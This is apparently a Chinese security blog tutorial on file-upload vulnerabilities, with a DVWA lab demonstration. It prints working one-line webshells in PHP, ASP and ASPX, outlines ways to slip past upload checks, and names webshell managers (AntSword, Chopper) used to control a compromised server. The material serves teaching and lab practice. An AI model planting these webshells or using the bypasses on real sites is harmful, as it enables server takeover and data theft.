★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
1、简介
任意文件上传漏洞是由于对上传文件未作过滤或过滤机制不严谨(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。主要有这些危害:攻击者可获得网站控制权限、攻击者可获得网站控制权限、通过提权漏洞可获得主机权限。
2、Webshell
Webshell是一种网页后门,以asp、php、jsp等网页文件形式存在的一种命令执行环境。也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
Webshell可划分为3类:大马、小马和一句话木马。大马特征是体积大,功能齐全,通常会调用系统的关键函数,以代码加密进行隐藏。小马的特征是体积小,功能小,只有一个上传功能。一句话木马的特征是代码短,只有一行代码,使用非常方便,可单独做一个文件,也可插入其他正常文件中,安全性高、隐匿性强、可变形免杀,基本框架不变,数据执行或数据传递。在文件上传漏洞常用的就是一句话木马。
# php的一句话木马
<?php @eval($_POST['pass']);?>
# asp的一句话木马
<%eval request ("pass")%>
# aspx的一句话木马
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
3、漏洞利用
攻击者要满足3个条件才能够成功入侵:
1.木马上传成功且未被杀;
2.知道木马的路径在哪;
3.上传的木马能正常运行(解析)。
部分网站带有文件上传功能,如果这个功能不做过滤或过滤机制不严谨,就能够上传任意文件至服务器。利用这个功能上传木马至服务器,就能够控制对应的服务器。木马上传成功后返回包一般会返回上传木马的路径和文件名。如果上传的是一句话木马,用菜刀或者C刀就可以控制服务器。
对于一些网站有进行上传过滤机制,我们通常可以通过4个方面去绕过:
1.绕过JS验证:
纯前端的验证,利用Burp Suite直接删除掉JS代码之后就可以绕过JS验证,或者利用浏览器的审查工具剔除JS之后,保存为新文件然后进行文件上传。
2.绕过MIME-Type验证:
服务端MIME类型检测是通过检查http包的Content-Type字段中的值来判断上传文件是否合法的。部分网站上传功能只对文件类型做了判断,抓包修改文件类型可绕过限制。如果只允许上传图片,则文件类型可为image/jpeg, image/png等。利用Burp Suite工具截断HTTP请求,在Repeater重放修改MIME-Type类型绕过验证。
3.绕过黑名单验证:
基于文件后缀名验证,只针对黑名单中没有的后缀名的文件才能上传成功。
4.绕过白名单验证:
基于文件后缀名验证,只针对白名单中有的后缀名的文件才能上传成功。
4、webshell管理工具使用
4.1、蚁剑
安装按照文档操作已成功,启动时点/AntSword-Loader-v4.0.3-win32-x64/AntSword.exe , 在主界面的数据管理右击可以添加数据,输入URL/密码,先点测试连接验证一句话木马是否上传成功。
4.2、菜刀
不需要安装,解压即可,双击解压目录下的chopper.exe,在主界面添加URL和密码添加,然后双击进入到目标服务器。
注意:菜刀对应连接的网站使用的php版本需要5.x,如果是7.x会连接不成功。蚁剑没有这个问题,如图
5、以DVWA靶场文件上传做实验
5.1、木马上传成功
安全等级选择Low
创建一个onehack.php,内容填充一句话木马
<?php
@eval($_POST['自定义密码'])
?>
5.2、知道木马路径
获取上传的文件路径
http://192.168.242.6/dvwa/hackable/uploads/onehack.php
5.3、木马内容可被解析、执行
6、资料获取
请关注我的公众号:大象只为你,后台回复:webshell管理工具,获取蚁剑和菜刀。
327
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
